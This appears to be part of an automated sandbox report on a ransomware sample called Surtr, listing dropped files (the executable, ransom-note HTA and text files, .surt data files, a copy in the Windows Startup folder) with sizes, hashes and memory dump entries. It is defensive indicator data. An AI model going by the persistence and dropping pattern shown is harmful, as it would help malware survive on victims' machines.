ca171656b9fd053f690801a1d455da7eab0a24596e7678d95cf56b0085cdc050d6e0948aa5089ac593cda161150649e33a16a2367230cca6ba2590e4a30cd85d

Download Submit
C:\ProgramData\Service\Public_DATA.surt

Filesize
204B

MD5
d501698a84bcbbeeda66a16073474c28

SHA1
a6da3c4b1cfeae541ed33cb0186309a25a6e1faf

SHA256
cbc140aa79c5a1a92a40be7292312536d2f705fcb56ee4417231485f475b161e

SHA512
a60f77cbeb221a938ea72c8fa5e702d4ae0c275845cd81a752a0e98e8772eecd95bc46b136a506fbd47a1bceebe502805d4ac08d26fa231ad3180dd4ad4a3ad7

Download Submit
C:\ProgramData\Service\SURTR_README.hta

Filesize
8KB

MD5
c3df410a4e482aedc4f65be42d97daff

SHA1
8602bbe25e87df92110732ccadda2d96eb82f4cf

SHA256
18452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a

SHA512
614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725

Download Submit
C:\ProgramData\Service\SURTR_README.txt

Filesize
621B

MD5
4c97b7389e84da2773ccb3443c234ae1

SHA1
7c66be6a0632a44ac2017e6e1bbd8f29809b61e2

SHA256
2d1c1b158ad44efd8f6c0db23fa516fd2ac7879f42382446ea714f670aa81058

SHA512
c7b41236f424452fb1a794fb3a372d6bcdc17e8d279ae3fd763f70e3d12261f768b1e69a6e30d70c3027ba730d21705ee63836f23d62616bf564c9a6069d7620

Download Submit
C:\ProgramData\Service\Surtr.exe

Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
C:\ProgramData\Service\SurtrBackGround.jpg

Filesize
30KB

MD5
33f7fc301be9d39fcb474fb8b1e5f42e

SHA1
a3bf9ddb2ac53bc4b12b249825189a7c7a07b766

SHA256
99cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03

SHA512
6cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00

Download Submit
C:\ProgramData\Service\SurtrIcon.ico

Filesize
78KB

MD5
3257eb22824b57fe3d58074bca3128d3

SHA1
6f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97

SHA256
5afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad

SHA512
7b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\ID_DATA.surt

Filesize
14B

MD5
a400ab7041049318608e1a9271e99d16

SHA1
8898c1fc86590b8f2ec053a525e9f823b89c9c31

SHA256
60765c25fc2143cfffe60c358acd3d0ccb3cebb58c6a01028831ecc43d4bae64

SHA512
95753c9493e311773235b5c78a8d695e26db7d3e677883849bc8790e0d76941602a456f9185af60ad0251d2e76edfa5f214cdc3bacd4a07a2b402f36ac526f76

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Private_DATA.surt

Filesize
1KB

MD5
a6d8b309d8fc19204b5bacccd10a3b23

SHA1
1fd075ce4724b9ef845da309bd34446ebea07670

SHA256
4fe478591626ae4b6722f50750be386acf31aae25f3afaa114d149958580753c

SHA512
ca171656b9fd053f690801a1d455da7eab0a24596e7678d95cf56b0085cdc050d6e0948aa5089ac593cda161150649e33a16a2367230cca6ba2590e4a30cd85d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\SURTR_README.hta

Filesize
8KB

MD5
c3df410a4e482aedc4f65be42d97daff

SHA1
8602bbe25e87df92110732ccadda2d96eb82f4cf

SHA256
18452592999fa1fce6ae4e5e42e2254aeff29cbb2c0f285cbe48d230e062d07a

SHA512
614771207b88ece3431780b9944a36c7c6da98f26f1d863c3af9acf33a7d2532897e3c9b6d161a3d0d9fff8236e05cf16368f5ce5cdbc0f6a5f7536332f9b725

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe

Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe

Filesize
320KB

MD5
e6fc190168519d6a6c4f1519e9450f0f

SHA1
af2080ddf1064fb80c7b9af942aaabf264441098

SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Download Submit
memory/956-56-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-59-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-58-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-62-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/956-55-0x0000000140000000-0x0000000140136000-memory.dmp

Filesize
1.2MB

Download
memory/4092-137-0x000007FEFC241000-0x000007FEFC243000-memory.dmp

Filesize
8KB

Download